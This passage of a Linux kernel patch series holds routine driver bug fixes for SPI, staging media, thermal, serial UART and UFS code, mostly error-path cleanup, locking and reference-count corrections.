++		if (!(mpc8xxx_spi->flags & SPI_CPM_MODE)) {
+ 			if (t->len < 256 || t->bits_per_word != 8)
+ 				continue;
+ 			if ((t->len & 3) == 0)
+@@ -348,7 +361,7 @@ static int fsl_spi_prepare_message(struct spi_controller *ctlr,
+ 				t->bits_per_word = 16;
+ 		}
+ 	}
+-	return 0;
++	return fsl_spi_setup_transfer(m->spi, first);
+ }
+ 
+ static int fsl_spi_transfer_one(struct spi_controller *controller,
+diff --git a/drivers/spi/spi-gpio.c b/drivers/spi/spi-gpio.c
+index 4b12c4964a664..9c8c7948044ed 100644
+--- a/drivers/spi/spi-gpio.c
++++ b/drivers/spi/spi-gpio.c
+@@ -268,9 +268,19 @@ static int spi_gpio_set_direction(struct spi_device *spi, bool output)
+ 	if (output)
+ 		return gpiod_direction_output(spi_gpio->mosi, 1);
+ 
+-	ret = gpiod_direction_input(spi_gpio->mosi);
+-	if (ret)
+-		return ret;
++	/*
++	 * Only change MOSI to an input if using 3WIRE mode.
++	 * Otherwise, MOSI could be left floating if there is
++	 * no pull resistor connected to the I/O pin, or could
++	 * be left logic high if there is a pull-up. Transmitting
++	 * logic high when only clocking MISO data in can put some
++	 * SPI devices into a bad state.
++	 */
++	if (spi->mode & SPI_3WIRE) {
++		ret = gpiod_direction_input(spi_gpio->mosi);
++		if (ret)
++			return ret;
++	}
+ 	/*
+ 	 * Send a turnaround high impedance cycle when switching
+ 	 * from output to input. Theoretically there should be
+diff --git a/drivers/spi/spidev.c b/drivers/spi/spidev.c
+index b2775d82d2d7b..6313e7d0cdf87 100644
+--- a/drivers/spi/spidev.c
++++ b/drivers/spi/spidev.c
+@@ -377,12 +377,23 @@ spidev_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
+ 	switch (cmd) {
+ 	/* read requests */
+ 	case SPI_IOC_RD_MODE:
+-		retval = put_user(spi->mode & SPI_MODE_MASK,
+-					(__u8 __user *)arg);
+-		break;
+ 	case SPI_IOC_RD_MODE32:
+-		retval = put_user(spi->mode & SPI_MODE_MASK,
+-					(__u32 __user *)arg);
++		tmp = spi->mode;
++
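++		/*
++		 * With a GPIO chip select the SPI core may have set
++		 * SPI_CS_HIGH internally, so hide that bit from the mode
++		 * reported back to user space.
++		 */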
++		{
++			struct spi_controller *ctlr = spi->controller;
++
++			if (ctlr->use_gpio_descriptors && ctlr->cs_gpiods &&
++			    ctlr->cs_gpiods[spi->chip_select])
++				tmp &= ~SPI_CS_HIGH;
++		}
++
++		if (cmd == SPI_IOC_RD_MODE)
++			retval = put_user(tmp & SPI_MODE_MASK,
++					  (__u8 __user *)arg);
++		else
++			retval = put_user(tmp & SPI_MODE_MASK,
++					  (__u32 __user *)arg);
+ 		break;
+ 	case SPI_IOC_RD_LSB_FIRST:
+ 		retval = put_user((spi->mode & SPI_LSB_FIRST) ?  1 : 0,
+diff --git a/drivers/staging/media/deprecated/stkwebcam/Kconfig b/drivers/staging/media/deprecated/stkwebcam/Kconfig
+index 4450403dff41f..7234498e634ac 100644
+--- a/drivers/staging/media/deprecated/stkwebcam/Kconfig
++++ b/drivers/staging/media/deprecated/stkwebcam/Kconfig
+@@ -2,7 +2,7 @@
+ config VIDEO_STKWEBCAM
+ 	tristate "USB Syntek DC1125 Camera support (DEPRECATED)"
+ 	depends on VIDEO_DEV
+-	depends on USB
++	depends on MEDIA_USB_SUPPORT && MEDIA_CAMERA_SUPPORT
+ 	help
+ 	  Say Y here if you want to use this type of camera.
+ 	  Supported devices are typically found in some Asus laptops,
+diff --git a/drivers/staging/media/imx/imx7-media-csi.c b/drivers/staging/media/imx/imx7-media-csi.c
+index e5b550ccfa22d..c77401f184d74 100644
+--- a/drivers/staging/media/imx/imx7-media-csi.c
++++ b/drivers/staging/media/imx/imx7-media-csi.c
+@@ -521,9 +521,9 @@ static void imx7_csi_configure(struct imx7_csi *csi)
+ 	cr18 = imx7_csi_reg_read(csi, CSI_CSICR18);
+ 
+ 	cr18 &= ~(BIT_CSI_HW_ENABLE | BIT_MIPI_DATA_FORMAT_MASK |
+-		  BIT_DATA_FROM_MIPI | BIT_BASEADDR_CHG_ERR_EN |
+-		  BIT_BASEADDR_SWITCH_EN | BIT_BASEADDR_SWITCH_SEL |
+-		  BIT_DEINTERLACE_EN);
++		  BIT_DATA_FROM_MIPI | BIT_MIPI_DOUBLE_CMPNT |
++		  BIT_BASEADDR_CHG_ERR_EN | BIT_BASEADDR_SWITCH_SEL |
++		  BIT_BASEADDR_SWITCH_EN | BIT_DEINTERLACE_EN);
+ 
+ 	if (out_pix->field == V4L2_FIELD_INTERLACED) {
+ 		cr18 |= BIT_DEINTERLACE_EN;
+diff --git a/drivers/staging/media/rkvdec/rkvdec-vp9.c b/drivers/staging/media/rkvdec/rkvdec-vp9.c
+index d8c1c0db15c70..cfae99b40ccb4 100644
+--- a/drivers/staging/media/rkvdec/rkvdec-vp9.c
++++ b/drivers/staging/media/rkvdec/rkvdec-vp9.c
+@@ -84,6 +84,8 @@ struct rkvdec_vp9_probs {
+ 		struct rkvdec_vp9_inter_frame_probs inter;
+ 		struct rkvdec_vp9_intra_only_frame_probs intra_only;
+ 	};
++	/* 128-bit alignment */
++	u8 padding1[11];
+ };
+ 
+ /* Data structure describing auxiliary buffer format. */
+@@ -1006,6 +1008,7 @@ static int rkvdec_vp9_start(struct rkvdec_ctx *ctx)
+ 
+ 	ctx->priv = vp9_ctx;
+ 
++	BUILD_BUG_ON(sizeof(priv_tbl->probs) % 16); /* ensure probs size is 128-bit aligned */
+ 	priv_tbl = dma_alloc_coherent(rkvdec->dev, sizeof(*priv_tbl),
+ 				      &vp9_ctx->priv_tbl.dma, GFP_KERNEL);
+ 	if (!priv_tbl) {
+diff --git a/drivers/staging/media/sunxi/cedrus/cedrus_h265.c b/drivers/staging/media/sunxi/cedrus/cedrus_h265.c
+index 4952fc17f3e6d..625f77a8c5bde 100644
+--- a/drivers/staging/media/sunxi/cedrus/cedrus_h265.c
++++ b/drivers/staging/media/sunxi/cedrus/cedrus_h265.c
+@@ -242,6 +242,18 @@ static void cedrus_h265_skip_bits(struct cedrus_dev *dev, int num)
+ 	}
+ }
+ 
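++/*
++ * Trigger a SHOW_BITS request for @num bits, wait for the VLD to finish,
++ * then read the value back from the VE_DEC_H265_BITS_READ register.
++ */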
++static u32 cedrus_h265_show_bits(struct cedrus_dev *dev, int num)
++{
++	cedrus_write(dev, VE_DEC_H265_TRIGGER,
++		     VE_DEC_H265_TRIGGER_SHOW_BITS |
++		     VE_DEC_H265_TRIGGER_TYPE_N_BITS(num));
++
++	cedrus_wait_for(dev, VE_DEC_H265_STATUS,
++			VE_DEC_H265_STATUS_VLD_BUSY);
++
++	return cedrus_read(dev, VE_DEC_H265_BITS_READ);
++}
++
+ static void cedrus_h265_write_scaling_list(struct cedrus_ctx *ctx,
+ 					   struct cedrus_run *run)
+ {
+@@ -406,7 +418,7 @@ static int cedrus_h265_setup(struct cedrus_ctx *ctx, struct cedrus_run *run)
+ 	u32 num_entry_point_offsets;
+ 	u32 output_pic_list_index;
+ 	u32 pic_order_cnt[2];
+-	u8 *padding;
++	u8 padding;
+ 	int count;
+ 	u32 reg;
+ 
+@@ -520,21 +532,22 @@ static int cedrus_h265_setup(struct cedrus_ctx *ctx, struct cedrus_run *run)
+ 	if (slice_params->data_byte_offset == 0)
+ 		return -EOPNOTSUPP;
+ 
+-	padding = (u8 *)vb2_plane_vaddr(&run->src->vb2_buf, 0) +
+-		slice_params->data_byte_offset - 1;
++	cedrus_h265_skip_bits(dev, (slice_params->data_byte_offset - 1) * 8);
++
++	padding = cedrus_h265_show_bits(dev, 8);
+ 
+ 	/* at least one bit must be set in that byte */
+-	if (*padding == 0)
++	if (padding == 0)
+ 		return -EINVAL;
+ 
+ 	for (count = 0; count < 8; count++)
+-		if (*padding & (1 << count))
++		if (padding & (1 << count))
+ 			break;
+ 
+ 	/* Include the one bit. */
+ 	count++;
+ 
+-	cedrus_h265_skip_bits(dev, slice_params->data_byte_offset * 8 - count);
++	cedrus_h265_skip_bits(dev, 8 - count);
+ 
+ 	/* Bitstream parameters. */
+ 
+diff --git a/drivers/staging/media/sunxi/cedrus/cedrus_regs.h b/drivers/staging/media/sunxi/cedrus/cedrus_regs.h
+index d81f7513ade0d..655c05b389cf5 100644
+--- a/drivers/staging/media/sunxi/cedrus/cedrus_regs.h
++++ b/drivers/staging/media/sunxi/cedrus/cedrus_regs.h
+@@ -505,6 +505,8 @@
+ #define VE_DEC_H265_LOW_ADDR_ENTRY_POINTS_BUF(a) \
+ 	SHIFT_AND_MASK_BITS(a, 7, 0)
+ 
++#define VE_DEC_H265_BITS_READ			(VE_ENGINE_DEC_H265 + 0xdc)
++
+ #define VE_DEC_H265_SRAM_OFFSET			(VE_ENGINE_DEC_H265 + 0xe0)
+ 
+ #define VE_DEC_H265_SRAM_OFFSET_PRED_WEIGHT_LUMA_L0	0x00
+diff --git a/drivers/staging/r8188eu/core/rtw_pwrctrl.c b/drivers/staging/r8188eu/core/rtw_pwrctrl.c
+index 870d81735b8dc..5290ac36f08c1 100644
+--- a/drivers/staging/r8188eu/core/rtw_pwrctrl.c
++++ b/drivers/staging/r8188eu/core/rtw_pwrctrl.c
+@@ -273,7 +273,7 @@ static s32 LPS_RF_ON_check(struct adapter *padapter, u32 delay_ms)
+ 			err = -1;
+ 			break;
+ 		}
+-		msleep(1);
++		mdelay(1);
+ 	}
+ 
+ 	return err;
+diff --git a/drivers/staging/rtl8192e/rtllib_rx.c b/drivers/staging/rtl8192e/rtllib_rx.c
+index 46d75e925ee9b..f710eb2a95f3a 100644
+--- a/drivers/staging/rtl8192e/rtllib_rx.c
++++ b/drivers/staging/rtl8192e/rtllib_rx.c
+@@ -1489,9 +1489,9 @@ static int rtllib_rx_Monitor(struct rtllib_device *ieee, struct sk_buff *skb,
+ 		hdrlen += 4;
+ 	}
+ 
+-	rtllib_monitor_rx(ieee, skb, rx_stats, hdrlen);
+ 	ieee->stats.rx_packets++;
+ 	ieee->stats.rx_bytes += skb->len;
++	rtllib_monitor_rx(ieee, skb, rx_stats, hdrlen);
+ 
+ 	return 1;
+ }
+diff --git a/drivers/staging/rtl8192u/ieee80211/ieee80211_rx.c b/drivers/staging/rtl8192u/ieee80211/ieee80211_rx.c
+index b58e75932ecd5..3686b3c599ce7 100644
+--- a/drivers/staging/rtl8192u/ieee80211/ieee80211_rx.c
++++ b/drivers/staging/rtl8192u/ieee80211/ieee80211_rx.c
+@@ -951,9 +951,11 @@ int ieee80211_rx(struct ieee80211_device *ieee, struct sk_buff *skb,
+ #endif
+ 
+ 	if (ieee->iw_mode == IW_MODE_MONITOR) {
++		unsigned int len = skb->len;
++
+ 		ieee80211_monitor_rx(ieee, skb, rx_stats);
+ 		stats->rx_packets++;
+-		stats->rx_bytes += skb->len;
++		stats->rx_bytes += len;
+ 		return 1;
+ 	}
+ 
+diff --git a/drivers/staging/vme_user/vme_fake.c b/drivers/staging/vme_user/vme_fake.c
+index dd646b0c531d4..1ee432c223e2b 100644
+--- a/drivers/staging/vme_user/vme_fake.c
++++ b/drivers/staging/vme_user/vme_fake.c
+@@ -1073,6 +1073,8 @@ static int __init fake_init(void)
+ 
+ 	/* We need a fake parent device */
+ 	vme_root = __root_device_register("vme", THIS_MODULE);
++	if (IS_ERR(vme_root))
++		return PTR_ERR(vme_root);
+ 
+ 	/* If we want to support more than one bridge at some point, we need to
+ 	 * dynamically allocate this so we get one per device.
+diff --git a/drivers/staging/vme_user/vme_tsi148.c b/drivers/staging/vme_user/vme_tsi148.c
+index 020e0b3bce64b..0171f46d1848f 100644
+--- a/drivers/staging/vme_user/vme_tsi148.c
++++ b/drivers/staging/vme_user/vme_tsi148.c
+@@ -1751,6 +1751,7 @@ static int tsi148_dma_list_add(struct vme_dma_list *list,
+ 	return 0;
+ 
+ err_dma:
++	list_del(&entry->list);
+ err_dest:
+ err_source:
+ err_align:
+diff --git a/drivers/target/iscsi/iscsi_target_nego.c b/drivers/target/iscsi/iscsi_target_nego.c
+index f2919319ad383..ff49c8f3fe241 100644
+--- a/drivers/target/iscsi/iscsi_target_nego.c
++++ b/drivers/target/iscsi/iscsi_target_nego.c
+@@ -1018,6 +1018,13 @@ static int iscsi_target_handle_csg_one(struct iscsit_conn *conn, struct iscsi_lo
+ 	return 0;
+ }
+ 
++/*
++ * RETURN VALUE:
++ *
++ *  1 = Login successful
++ * -1 = Login failed
++ *  0 = More PDU exchanges required
++ */
+ static int iscsi_target_do_login(struct iscsit_conn *conn, struct iscsi_login *login)
+ {
+ 	int pdu_count = 0;
+@@ -1363,12 +1370,13 @@ int iscsi_target_start_negotiation(
+ 		ret = -1;
+ 
+ 	if (ret < 0) {
+-		cancel_delayed_work_sync(&conn->login_work);
+ 		iscsi_target_restore_sock_callbacks(conn);
+ 		iscsi_remove_failed_auth_entry(conn);
+ 	}
+-	if (ret != 0)
++	if (ret != 0) {
++		cancel_delayed_work_sync(&conn->login_work);
+ 		iscsi_target_nego_release(conn);
++	}
+ 
+ 	return ret;
+ }
+diff --git a/drivers/thermal/imx8mm_thermal.c b/drivers/thermal/imx8mm_thermal.c
+index e2c2673025a7a..258d988b266d7 100644
+--- a/drivers/thermal/imx8mm_thermal.c
++++ b/drivers/thermal/imx8mm_thermal.c
+@@ -65,8 +65,14 @@ static int imx8mm_tmu_get_temp(void *data, int *temp)
+ 	u32 val;
+ 
+ 	val = readl_relaxed(tmu->base + TRITSR) & TRITSR_TEMP0_VAL_MASK;
++
++	/*
++	 * Do not validate against the V bit (bit 31) due to errata
++	 * ERR051272: TMU: Bit 31 of registers TMU_TSCR/TMU_TRITSR/TMU_TRATSR invalid
++	 */
++
+ 	*temp = val * 1000;
+-	if (*temp < VER1_TEMP_LOW_LIMIT)
++	if (*temp < VER1_TEMP_LOW_LIMIT || *temp > VER2_TEMP_HIGH_LIMIT)
+ 		return -EAGAIN;
+ 
+ 	return 0;
+diff --git a/drivers/thermal/k3_j72xx_bandgap.c b/drivers/thermal/k3_j72xx_bandgap.c
+index 16b6bcf1bf4fa..c073b1023bbe7 100644
+--- a/drivers/thermal/k3_j72xx_bandgap.c
++++ b/drivers/thermal/k3_j72xx_bandgap.c
+@@ -439,7 +439,7 @@ static int k3_j72xx_bandgap_probe(struct platform_device *pdev)
+ 		workaround_needed = false;
+ 
+ 	dev_dbg(bgp->dev, "Work around %sneeded\n",
+-		workaround_needed ? "not " : "");
++		workaround_needed ? "" : "not ");
+ 
+ 	if (!workaround_needed)
+ 		init_table(5, ref_table, golden_factors);
+diff --git a/drivers/thermal/qcom/lmh.c b/drivers/thermal/qcom/lmh.c
+index d3d9b9fa49e81..4122a51e98741 100644
+--- a/drivers/thermal/qcom/lmh.c
++++ b/drivers/thermal/qcom/lmh.c
+@@ -45,7 +45,7 @@ static irqreturn_t lmh_handle_irq(int hw_irq, void *data)
+ 	if (irq)
+ 		generic_handle_irq(irq);
+ 
+-	return 0;
++	return IRQ_HANDLED;
+ }
+ 
+ static void lmh_enable_interrupt(struct irq_data *d)
+diff --git a/drivers/thermal/qcom/qcom-spmi-temp-alarm.c b/drivers/thermal/qcom/qcom-spmi-temp-alarm.c
+index be785ab37e53d..ad84978109e6f 100644
+--- a/drivers/thermal/qcom/qcom-spmi-temp-alarm.c
++++ b/drivers/thermal/qcom/qcom-spmi-temp-alarm.c
+@@ -252,7 +252,8 @@ static int qpnp_tm_update_critical_trip_temp(struct qpnp_tm_chip *chip,
+ 			disable_s2_shutdown = true;
+ 		else
+ 			dev_warn(chip->dev,
+-				 "No ADC is configured and critical temperature is above the maximum stage 2 threshold of 140 C! Configuring stage 2 shutdown at 140 C.\n");
++				 "No ADC is configured and critical temperature %d mC is above the maximum stage 2 threshold of %ld mC! Configuring stage 2 shutdown at %ld mC.\n",
++				 temp, stage2_threshold_max, stage2_threshold_max);
+ 	}
+ 
+ skip:
+diff --git a/drivers/thermal/thermal_core.c b/drivers/thermal/thermal_core.c
+index 117eeaf7dd241..615fdda3a5de7 100644
+--- a/drivers/thermal/thermal_core.c
++++ b/drivers/thermal/thermal_core.c
+@@ -883,10 +883,6 @@ __thermal_cooling_device_register(struct device_node *np,
+ 	cdev->id = ret;
+ 	id = ret;
+ 
+-	ret = dev_set_name(&cdev->device, "cooling_device%d", cdev->id);
+-	if (ret)
+-		goto out_ida_remove;
+-
+ 	cdev->type = kstrdup(type ? type : "", GFP_KERNEL);
+ 	if (!cdev->type) {
+ 		ret = -ENOMEM;
+@@ -901,6 +897,11 @@ __thermal_cooling_device_register(struct device_node *np,
+ 	cdev->device.class = &thermal_class;
+ 	cdev->devdata = devdata;
+ 	thermal_cooling_device_setup_sysfs(cdev);
++	ret = dev_set_name(&cdev->device, "cooling_device%d", cdev->id);
++	if (ret) {
++		thermal_cooling_device_destroy_sysfs(cdev);
++		goto out_kfree_type;
++	}
+ 	ret = device_register(&cdev->device);
+ 	if (ret)
+ 		goto out_kfree_type;
+@@ -1234,10 +1235,6 @@ thermal_zone_device_register_with_trips(const char *type, struct thermal_trip *t
+ 	tz->id = id;
+ 	strscpy(tz->type, type, sizeof(tz->type));
+ 
+-	result = dev_set_name(&tz->device, "thermal_zone%d", tz->id);
+-	if (result)
+-		goto remove_id;
+-
+ 	if (!ops->critical)
+ 		ops->critical = thermal_zone_device_critical;
+ 
+@@ -1260,6 +1257,11 @@ thermal_zone_device_register_with_trips(const char *type, struct thermal_trip *t
+ 	/* A new thermal zone needs to be updated anyway. */
+ 	atomic_set(&tz->need_update, 1);
+ 
++	result = dev_set_name(&tz->device, "thermal_zone%d", tz->id);
++	if (result) {
++		thermal_zone_destroy_device_groups(tz);
++		goto remove_id;
++	}
+ 	result = device_register(&tz->device);
+ 	if (result)
+ 		goto release_device;
+diff --git a/drivers/thermal/thermal_helpers.c b/drivers/thermal/thermal_helpers.c
+index c65cdce8f856e..fca0b23570f96 100644
+--- a/drivers/thermal/thermal_helpers.c
++++ b/drivers/thermal/thermal_helpers.c
+@@ -115,7 +115,12 @@ int thermal_zone_get_temp(struct thermal_zone_device *tz, int *temp)
+ 	int ret;
+ 
+ 	mutex_lock(&tz->lock);
+-	ret = __thermal_zone_get_temp(tz, temp);
++
++	if (device_is_registered(&tz->device))
++		ret = __thermal_zone_get_temp(tz, temp);
++	else
++		ret = -ENODEV;
++
+ 	mutex_unlock(&tz->lock);
+ 
+ 	return ret;
+diff --git a/drivers/thermal/thermal_of.c b/drivers/thermal/thermal_of.c
+index d4b6335ace15f..aacba30bc10c1 100644
+--- a/drivers/thermal/thermal_of.c
++++ b/drivers/thermal/thermal_of.c
+@@ -604,13 +604,15 @@ struct thermal_zone_device *thermal_of_zone_register(struct device_node *sensor,
+ 	if (IS_ERR(np)) {
+ 		if (PTR_ERR(np) != -ENODEV)
+ 			pr_err("Failed to find thermal zone for %pOFn id=%d\n", sensor, id);
+-		return ERR_CAST(np);
++		ret = PTR_ERR(np);
++		goto out_kfree_of_ops;
+ 	}
+ 
+ 	trips = thermal_of_trips_init(np, &ntrips);
+ 	if (IS_ERR(trips)) {
+ 		pr_err("Failed to find trip points for %pOFn id=%d\n", sensor, id);
+-		return ERR_CAST(trips);
++		ret = PTR_ERR(trips);
++		goto out_kfree_of_ops;
+ 	}
+ 
+ 	ret = thermal_of_monitor_init(np, &delay, &pdelay);
+@@ -659,6 +661,8 @@ out_kfree_tzp:
+ 	kfree(tzp);
+ out_kfree_trips:
+ 	kfree(trips);
++out_kfree_of_ops:
++	kfree(of_ops);
+ 
+ 	return ERR_PTR(ret);
+ }
+diff --git a/drivers/tty/serial/8250/8250_bcm7271.c b/drivers/tty/serial/8250/8250_bcm7271.c
+index fa8ccf204d860..89bfcefbea848 100644
+--- a/drivers/tty/serial/8250/8250_bcm7271.c
++++ b/drivers/tty/serial/8250/8250_bcm7271.c
+@@ -1212,9 +1212,17 @@ static struct platform_driver brcmuart_platform_driver = {
+ 
+ static int __init brcmuart_init(void)
+ {
++	int ret;
++
+ 	brcmuart_debugfs_root = debugfs_create_dir(
+ 		brcmuart_platform_driver.driver.name, NULL);
+-	return platform_driver_register(&brcmuart_platform_driver);
++	ret = platform_driver_register(&brcmuart_platform_driver);
++	if (ret) {
++		debugfs_remove_recursive(brcmuart_debugfs_root);
++		return ret;
++	}
++
++	return 0;
+ }
+ module_init(brcmuart_init);
+ 
+diff --git a/drivers/tty/serial/altera_uart.c b/drivers/tty/serial/altera_uart.c
+index 82f2790de28d1..1203d1e08cd6c 100644
+--- a/drivers/tty/serial/altera_uart.c
++++ b/drivers/tty/serial/altera_uart.c
+@@ -278,16 +278,17 @@ static irqreturn_t altera_uart_interrupt(int irq, void *data)
+ {
+ 	struct uart_port *port = data;
+ 	struct altera_uart *pp = container_of(port, struct altera_uart, port);
++	unsigned long flags;
+ 	unsigned int isr;
+ 
+ 	isr = altera_uart_readl(port, ALTERA_UART_STATUS_REG) & pp->imr;
+ 
+-	spin_lock(&port->lock);
++	spin_lock_irqsave(&port->lock, flags);
+ 	if (isr & ALTERA_UART_STATUS_RRDY_MSK)
+ 		altera_uart_rx_chars(port);
+ 	if (isr & ALTERA_UART_STATUS_TRDY_MSK)
+ 		altera_uart_tx_chars(port);
+-	spin_unlock(&port->lock);
++	spin_unlock_irqrestore(&port->lock, flags);
+ 
+ 	return IRQ_RETVAL(isr);
+ }
+diff --git a/drivers/tty/serial/amba-pl011.c b/drivers/tty/serial/amba-pl011.c
+index 5cdced39eafdb..aa0bbb7abeacf 100644
+--- a/drivers/tty/serial/amba-pl011.c
++++ b/drivers/tty/serial/amba-pl011.c
+@@ -1045,6 +1045,9 @@ static void pl011_dma_rx_callback(void *data)
+  */
+ static inline void pl011_dma_rx_stop(struct uart_amba_port *uap)
+ {
++	if (!uap->using_rx_dma)
++		return;
++
+ 	/* FIXME.  Just disable the DMA enable */
+ 	uap->dmacr &= ~UART011_RXDMAE;
+ 	pl011_write(uap->dmacr, uap, REG_DMACR);
+@@ -1828,8 +1831,17 @@ static void pl011_enable_interrupts(struct uart_amba_port *uap)
+ static void pl011_unthrottle_rx(struct uart_port *port)
+ {
+ 	struct uart_amba_port *uap = container_of(port, struct uart_amba_port, port);
++	unsigned long flags;
+ 
+-	pl011_enable_interrupts(uap);
++	spin_lock_irqsave(&uap->port.lock, flags);
++
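++	/*
++	 * Unmask the receive-timeout interrupt, and the RX interrupt only
++	 * when DMA is not already draining the receive FIFO.
++	 */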
++	uap->im = UART011_RTIM;
++	if (!pl011_dma_rx_running(uap))
++		uap->im |= UART011_RXIM;
++
++	pl011_write(uap->im, uap, REG_IMSC);
++
++	spin_unlock_irqrestore(&uap->port.lock, flags);
+ }
+ 
+ static int pl011_startup(struct uart_port *port)
+diff --git a/drivers/tty/serial/pch_uart.c b/drivers/tty/serial/pch_uart.c
+index c59ce78865799..b17788cf309b1 100644
+--- a/drivers/tty/serial/pch_uart.c
++++ b/drivers/tty/serial/pch_uart.c
+@@ -694,6 +694,7 @@ static void pch_request_dma(struct uart_port *port)
+ 	if (!chan) {
+ 		dev_err(priv->port.dev, "%s:dma_request_channel FAILS(Tx)\n",
+ 			__func__);
++		pci_dev_put(dma_dev);
+ 		return;
+ 	}
+ 	priv->chan_tx = chan;
+@@ -710,6 +711,7 @@ static void pch_request_dma(struct uart_port *port)
+ 			__func__);
+ 		dma_release_channel(priv->chan_tx);
+ 		priv->chan_tx = NULL;
++		pci_dev_put(dma_dev);
+ 		return;
+ 	}
+ 
+@@ -717,6 +719,8 @@ static void pch_request_dma(struct uart_port *port)
+ 	priv->rx_buf_virt = dma_alloc_coherent(port->dev, port->fifosize,
+ 				    &priv->rx_buf_dma, GFP_KERNEL);
+ 	priv->chan_rx = chan;
++
++	pci_dev_put(dma_dev);
+ }
+ 
+ static void pch_dma_rx_complete(void *arg)
+diff --git a/drivers/tty/serial/serial-tegra.c b/drivers/tty/serial/serial-tegra.c
+index b7170cb9a544f..cda9cd4fa92c8 100644
+--- a/drivers/tty/serial/serial-tegra.c
++++ b/drivers/tty/serial/serial-tegra.c
+@@ -619,8 +619,9 @@ static void tegra_uart_stop_tx(struct uart_port *u)
+ 	if (tup->tx_in_progress != TEGRA_UART_TX_DMA)
+ 		return;
+ 
+-	dmaengine_terminate_all(tup->tx_dma_chan);
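++	/*
++	 * Pause the channel and read the residue before terminating, since
++	 * dmaengine_terminate_all() discards the in-flight descriptor state.
++	 */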
++	dmaengine_pause(tup->tx_dma_chan);
+ 	dmaengine_tx_status(tup->tx_dma_chan, tup->tx_cookie, &state);
++	dmaengine_terminate_all(tup->tx_dma_chan);
+ 	count = tup->tx_bytes_requested - state.residue;
+ 	async_tx_ack(tup->tx_dma_desc);
+ 	uart_xmit_advance(&tup->uport, count);
+@@ -763,8 +764,9 @@ static void tegra_uart_terminate_rx_dma(struct tegra_uart_port *tup)
+ 		return;
+ 	}
+ 
+-	dmaengine_terminate_all(tup->rx_dma_chan);
++	dmaengine_pause(tup->rx_dma_chan);
+ 	dmaengine_tx_status(tup->rx_dma_chan, tup->rx_cookie, &state);
++	dmaengine_terminate_all(tup->rx_dma_chan);
+ 
+ 	tegra_uart_rx_buffer_push(tup, state.residue);
+ 	tup->rx_dma_active = false;
+diff --git a/drivers/tty/serial/stm32-usart.c b/drivers/tty/serial/stm32-usart.c
+index dfdbcf092facc..b8aed28b8f17b 100644
+--- a/drivers/tty/serial/stm32-usart.c
++++ b/drivers/tty/serial/stm32-usart.c
+@@ -1681,22 +1681,10 @@ static int stm32_usart_serial_probe(struct platform_device *pdev)
+ 	if (!stm32port->info)
+ 		return -EINVAL;
+ 
+-	ret = stm32_usart_init_port(stm32port, pdev);
+-	if (ret)
+-		return ret;
+-
+-	if (stm32port->wakeup_src) {
+-		device_set_wakeup_capable(&pdev->dev, true);
+-		ret = dev_pm_set_wake_irq(&pdev->dev, stm32port->port.irq);
+-		if (ret)
+-			goto err_deinit_port;
+-	}
+-
+ 	stm32port->rx_ch = dma_request_chan(&pdev->dev, "rx");
+-	if (PTR_ERR(stm32port->rx_ch) == -EPROBE_DEFER) {
+-		ret = -EPROBE_DEFER;
+-		goto err_wakeirq;
+-	}
++	if (PTR_ERR(stm32port->rx_ch) == -EPROBE_DEFER)
++		return -EPROBE_DEFER;
++
+ 	/* Fall back in interrupt mode for any non-deferral error */
+ 	if (IS_ERR(stm32port->rx_ch))
+ 		stm32port->rx_ch = NULL;
+@@ -1710,6 +1698,17 @@ static int stm32_usart_serial_probe(struct platform_device *pdev)
+ 	if (IS_ERR(stm32port->tx_ch))
+ 		stm32port->tx_ch = NULL;
+ 
++	ret = stm32_usart_init_port(stm32port, pdev);
++	if (ret)
++		goto err_dma_tx;
++
++	if (stm32port->wakeup_src) {
++		device_set_wakeup_capable(&pdev->dev, true);
++		ret = dev_pm_set_wake_irq(&pdev->dev, stm32port->port.irq);
++		if (ret)
++			goto err_deinit_port;
++	}
++
+ 	if (stm32port->rx_ch && stm32_usart_of_dma_rx_probe(stm32port, pdev)) {
+ 		/* Fall back in interrupt mode */
+ 		dma_release_channel(stm32port->rx_ch);
+@@ -1746,19 +1745,11 @@ err_port:
+ 	pm_runtime_set_suspended(&pdev->dev);
+ 	pm_runtime_put_noidle(&pdev->dev);
+ 
+-	if (stm32port->tx_ch) {
++	if (stm32port->tx_ch)
+ 		stm32_usart_of_dma_tx_remove(stm32port, pdev);
+-		dma_release_channel(stm32port->tx_ch);
+-	}
+-
+ 	if (stm32port->rx_ch)
+ 		stm32_usart_of_dma_rx_remove(stm32port, pdev);
+ 
+-err_dma_rx:
+-	if (stm32port->rx_ch)
+-		dma_release_channel(stm32port->rx_ch);
+-
+-err_wakeirq:
+ 	if (stm32port->wakeup_src)
+ 		dev_pm_clear_wake_irq(&pdev->dev);
+ 
+@@ -1768,6 +1759,14 @@ err_deinit_port:
+ 
+ 	stm32_usart_deinit_port(stm32port);
+ 
++err_dma_tx:
++	if (stm32port->tx_ch)
++		dma_release_channel(stm32port->tx_ch);
++
++err_dma_rx:
++	if (stm32port->rx_ch)
++		dma_release_channel(stm32port->rx_ch);
++
+ 	return ret;
+ }
+ 
+diff --git a/drivers/tty/serial/sunsab.c b/drivers/tty/serial/sunsab.c
+index 99608b2a2b74f..7ace3aa498402 100644
+--- a/drivers/tty/serial/sunsab.c
++++ b/drivers/tty/serial/sunsab.c
+@@ -1133,7 +1133,13 @@ static int __init sunsab_init(void)
+ 		}
+ 	}
+ 
+-	return platform_driver_register(&sab_driver);
++	err = platform_driver_register(&sab_driver);
++	if (err) {
++		kfree(sunsab_ports);
++		sunsab_ports = NULL;
++	}
++
++	return err;
+ }
+ 
+ static void __exit sunsab_exit(void)
+diff --git a/drivers/ufs/core/ufshcd.c b/drivers/ufs/core/ufshcd.c
+index b1f59a5fe6327..d1db6be801560 100644
+--- a/drivers/ufs/core/ufshcd.c
++++ b/drivers/ufs/core/ufshcd.c
+@@ -5382,6 +5382,26 @@ static void __ufshcd_transfer_req_compl(struct ufs_hba *hba,
+ 	}
+ }
+ 
++/* Any value that is not an existing queue number is fine for this constant. */
++enum {
++	UFSHCD_POLL_FROM_INTERRUPT_CONTEXT = -1
++};
++
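++/*
++ * Drop the bits of requests that were submitted with REQ_POLLED from
++ * @completed_reqs so they are completed by the polling code instead of
++ * the interrupt path.
++ */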
++static void ufshcd_clear_polled(struct ufs_hba *hba,
++				unsigned long *completed_reqs)
++{
++	int tag;
++
++	for_each_set_bit(tag, completed_reqs, hba->nutrs) {
++		struct scsi_cmnd *cmd = hba->lrb[tag].cmd;
++
++		if (!cmd)
++			continue;
++		if (scsi_cmd_to_rq(cmd)->cmd_flags & REQ_POLLED)
++			__clear_bit(tag, completed_reqs);
++	}
++}
++
+ /*
+  * Returns > 0 if one or more commands have been completed or 0 if no
